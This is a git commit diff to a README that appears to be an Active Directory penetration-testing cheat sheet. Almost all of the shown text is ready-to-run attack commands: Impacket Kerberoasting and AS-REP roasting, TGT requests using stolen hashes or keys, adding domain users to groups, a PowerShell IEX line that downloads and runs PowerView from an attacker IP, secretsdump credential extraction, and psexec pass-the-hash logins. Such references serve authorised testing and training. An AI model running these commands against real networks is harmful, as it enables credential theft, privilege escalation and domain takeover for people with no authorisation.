Update README.md

Joe Totes
2022-09-06 10:56:58 -04:00
committed by GitHub
parent 2f8536fc88
commit f718feded7


@@ -670,16 +670,11 @@ python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py -request {DOMAIN
# ASREP ROAST # ASREP ROAST
python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py -request {DOMAIN}/ -dc-ip {IP ADDRESS} -format john python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py -request {DOMAIN}/ -dc-ip {IP ADDRESS} -format john
python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py {DOMAIN}/ -dc-ip {IP ADDRESS} -usersfile {USER.txt} -format john python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py {DOMAIN}/ -dc-ip {IP ADDRESS} -usersfile {USER.txt} -format john
# Request the TGT with hash # Request the TGT with hash, AES key, or password
python3 /usr/share/doc/python3-impacket/examples/getTGT.py {DOMAIN}/{USERNAME} -hashes {LM HASH}:{NTLM HASH} python3 /usr/share/doc/python3-impacket/examples/getTGT.py {DOMAIN}/{USERNAME} -hashes {LM HASH}:{NTLM HASH}
# Request the TGT with aesKey (more secure encryption, probably more stealth due is the used by default by Microsoft)
python getTGT.py {DOMAIN}/{USERNAME} -aesKey {AES KEY} python getTGT.py {DOMAIN}/{USERNAME} -aesKey {AES KEY}
# Request the TGT with password
python getTGT.py {DOMAIN}/{USERNAME}:{PASSWORD} python getTGT.py {DOMAIN}/{USERNAME}:{PASSWORD}
# Bloodhound # Bloodhound
@@ -693,6 +688,7 @@ net user {USERNAME} {PASSWORD} /add /domain
# Add user to group # Add user to group
net group "{GROUP}" {USERNAME} /add net group "{GROUP}" {USERNAME} /add
# Powerview example
IEX(New-Object Net.WebClient).downloadstring("http://{IP ADDRESS}/PowerView.ps1") IEX(New-Object Net.WebClient).downloadstring("http://{IP ADDRESS}/PowerView.ps1")
$pass = convertto-securestring '{PASSWORD}' -AsPlainText -Force $pass = convertto-securestring '{PASSWORD}' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('{DOMAIN}\{USERNAME}', $pass) $cred = New-Object System.Management.Automation.PSCredential('{DOMAIN}\{USERNAME}', $pass)
@@ -703,7 +699,7 @@ sudo python3 /usr/share/doc/python3-impacket/examples/secretsdump.py '{DOMAIN}/{
# PSEXEC # PSEXEC
sudo python3 /usr/share/doc/python3-impacket/examples/psexec.py -hashes {HASH1:HASH2} {USERNAME}@{IP ADDRESS} sudo python3 /usr/share/doc/python3-impacket/examples/psexec.py -hashes {HASH1:HASH2} {USERNAME}@{IP ADDRESS}
sudo python3 /usr/share/doc/python3-impacket/examples/psexec.py {USERNAME}:{PASSWORD}@{IP ADDRESS}
``` ```